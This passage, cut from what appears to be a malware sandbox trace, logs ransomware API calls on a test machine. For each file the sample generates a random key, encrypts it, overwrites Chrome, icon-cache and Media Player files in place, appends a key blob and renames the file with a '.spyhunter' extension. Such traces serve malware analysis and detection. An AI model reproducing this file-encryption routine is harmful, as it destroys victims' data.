halpmcxz\\appdata\\local\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0138.305] GetProcessHeap () returned 0x2c0000 [0138.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.306] GetProcessHeap () returned 0x2c0000 [0138.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80970 | out: hHeap=0x2c0000) returned 1 [0138.306] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f390 | out: pbBuffer=0x57f390) returned 1 [0138.306] GetProcessHeap () returned 0x2c0000 [0138.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f388*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f388*=0x30) returned 1 [0138.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0138.307] StrStrW (lpFirst="IconCache.db", lpSrch=".txt") returned 0x0 [0138.307] GetProcessHeap () returned 0x2c0000 [0138.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.307] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f34c*=0x2800, lpOverlapped=0x0) returned 1 [0138.308] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.308] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f34c*=0x2800, lpOverlapped=0x0) returned 1 [0138.309] GetProcessHeap () returned 0x2c0000 [0138.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.309] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.309] WriteFile (in: hFile=0x178, lpBuffer=0x57f38c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f34c, lpOverlapped=0x0 | out: lpBuffer=0x57f38c*, lpNumberOfBytesWritten=0x57f34c*=0x4, lpOverlapped=0x0) returned 1 [0138.310] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f34c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f34c*=0x30, lpOverlapped=0x0) returned 1 [0138.311] CloseHandle (hObject=0x178) returned 1 [0138.311] GetProcessHeap () returned 0x2c0000 [0138.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.311] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.spyhunter") returned 70 [0138.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.spyhunter")) returned 1 [0138.312] GetProcessHeap () returned 0x2c0000 [0138.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.313] GetProcessHeap () returned 0x2c0000 [0138.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.313] GetProcessHeap () returned 0x2c0000 [0138.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84f10 | out: hHeap=0x2c0000) returned 1 [0138.322] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f370 | out: pbBuffer=0x57f370) returned 1 [0138.322] GetProcessHeap () returned 0x2c0000 [0138.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f368*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f368*=0x30) returned 1 [0138.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0138.322] StrStrW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".txt") returned 0x0 [0138.322] GetProcessHeap () returned 0x2c0000 [0138.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.323] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f32c*=0x0, lpOverlapped=0x0) returned 1 [0138.323] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.323] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f32c*=0x0, lpOverlapped=0x0) returned 1 [0138.323] GetProcessHeap () returned 0x2c0000 [0138.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.323] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.323] WriteFile (in: hFile=0x178, lpBuffer=0x57f36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x57f36c*, lpNumberOfBytesWritten=0x57f32c*=0x4, lpOverlapped=0x0) returned 1 [0138.324] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f32c*=0x30, lpOverlapped=0x0) returned 1 [0138.324] CloseHandle (hObject=0x178) returned 1 [0138.324] GetProcessHeap () returned 0x2c0000 [0138.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.324] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.spyhunter") returned 111 [0138.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal.spyhunter")) returned 1 [0138.325] GetProcessHeap () returned 0x2c0000 [0138.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.325] GetProcessHeap () returned 0x2c0000 [0138.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.325] GetProcessHeap () returned 0x2c0000 [0138.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ab50 | out: hHeap=0x2c0000) returned 1 [0138.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f370 | out: pbBuffer=0x57f370) returned 1 [0138.325] GetProcessHeap () returned 0x2c0000 [0138.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f368*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f368*=0x30) returned 1 [0138.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.326] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0138.326] StrStrW (lpFirst="Safe Browsing Cookies", lpSrch=".txt") returned 0x0 [0138.326] GetProcessHeap () returned 0x2c0000 [0138.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.326] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f32c*=0x1c00, lpOverlapped=0x0) returned 1 [0138.412] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe400, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.412] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f32c*=0x1c00, lpOverlapped=0x0) returned 1 [0138.412] GetProcessHeap () returned 0x2c0000 [0138.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.413] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.413] WriteFile (in: hFile=0x178, lpBuffer=0x57f36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x57f36c*, lpNumberOfBytesWritten=0x57f32c*=0x4, lpOverlapped=0x0) returned 1 [0138.413] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f32c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f32c*=0x30, lpOverlapped=0x0) returned 1 [0138.413] CloseHandle (hObject=0x178) returned 1 [0138.413] GetProcessHeap () returned 0x2c0000 [0138.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.413] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.spyhunter") returned 103 [0138.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies.spyhunter")) returned 1 [0138.414] GetProcessHeap () returned 0x2c0000 [0138.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.414] GetProcessHeap () returned 0x2c0000 [0138.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.414] GetProcessHeap () returned 0x2c0000 [0138.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b778 | out: hHeap=0x2c0000) returned 1 [0138.414] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f368 | out: pbBuffer=0x57f368) returned 1 [0138.414] GetProcessHeap () returned 0x2c0000 [0138.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f360*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f360*=0x30) returned 1 [0138.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0138.415] StrStrW (lpFirst="TransportSecurity", lpSrch=".txt") returned 0x0 [0138.415] GetProcessHeap () returned 0x2c0000 [0138.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.415] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f324, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f324*=0x278, lpOverlapped=0x0) returned 1 [0138.460] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.461] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x57f324, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f324*=0x278, lpOverlapped=0x0) returned 1 [0138.461] GetProcessHeap () returned 0x2c0000 [0138.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.461] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.461] WriteFile (in: hFile=0x178, lpBuffer=0x57f364*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f324, lpOverlapped=0x0 | out: lpBuffer=0x57f364*, lpNumberOfBytesWritten=0x57f324*=0x4, lpOverlapped=0x0) returned 1 [0138.461] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f324, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f324*=0x30, lpOverlapped=0x0) returned 1 [0138.461] CloseHandle (hObject=0x178) returned 1 [0138.461] GetProcessHeap () returned 0x2c0000 [0138.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.462] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.spyhunter") returned 107 [0138.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity.spyhunter")) returned 1 [0138.463] GetProcessHeap () returned 0x2c0000 [0138.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.463] GetProcessHeap () returned 0x2c0000 [0138.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.463] GetProcessHeap () returned 0x2c0000 [0138.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a5d8 | out: hHeap=0x2c0000) returned 1 [0138.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f360 | out: pbBuffer=0x57f360) returned 1 [0138.466] GetProcessHeap () returned 0x2c0000 [0138.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.466] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f358*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f358*=0x30) returned 1 [0138.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0138.467] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0138.467] GetProcessHeap () returned 0x2c0000 [0138.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.467] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f31c*=0x437, lpOverlapped=0x0) returned 1 [0138.512] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.512] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f31c*=0x437, lpOverlapped=0x0) returned 1 [0138.513] GetProcessHeap () returned 0x2c0000 [0138.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.513] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.513] WriteFile (in: hFile=0x178, lpBuffer=0x57f35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x57f35c*, lpNumberOfBytesWritten=0x57f31c*=0x4, lpOverlapped=0x0) returned 1 [0138.513] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f31c*=0x30, lpOverlapped=0x0) returned 1 [0138.513] CloseHandle (hObject=0x178) returned 1 [0138.513] GetProcessHeap () returned 0x2c0000 [0138.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.513] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.spyhunter") returned 127 [0138.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl.spyhunter")) returned 1 [0138.514] GetProcessHeap () returned 0x2c0000 [0138.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.514] GetProcessHeap () returned 0x2c0000 [0138.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.514] GetProcessHeap () returned 0x2c0000 [0138.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47d00 | out: hHeap=0x2c0000) returned 1 [0138.514] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f360 | out: pbBuffer=0x57f360) returned 1 [0138.514] GetProcessHeap () returned 0x2c0000 [0138.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.514] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f358*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f358*=0x30) returned 1 [0138.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0138.515] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0138.515] GetProcessHeap () returned 0x2c0000 [0138.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.515] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f31c*=0x504, lpOverlapped=0x0) returned 1 [0138.516] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.516] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f31c*=0x504, lpOverlapped=0x0) returned 1 [0138.517] GetProcessHeap () returned 0x2c0000 [0138.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.517] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.517] WriteFile (in: hFile=0x178, lpBuffer=0x57f35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x57f35c*, lpNumberOfBytesWritten=0x57f31c*=0x4, lpOverlapped=0x0) returned 1 [0138.517] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f31c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f31c*=0x30, lpOverlapped=0x0) returned 1 [0138.517] CloseHandle (hObject=0x178) returned 1 [0138.517] GetProcessHeap () returned 0x2c0000 [0138.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.517] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.spyhunter") returned 148 [0138.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js 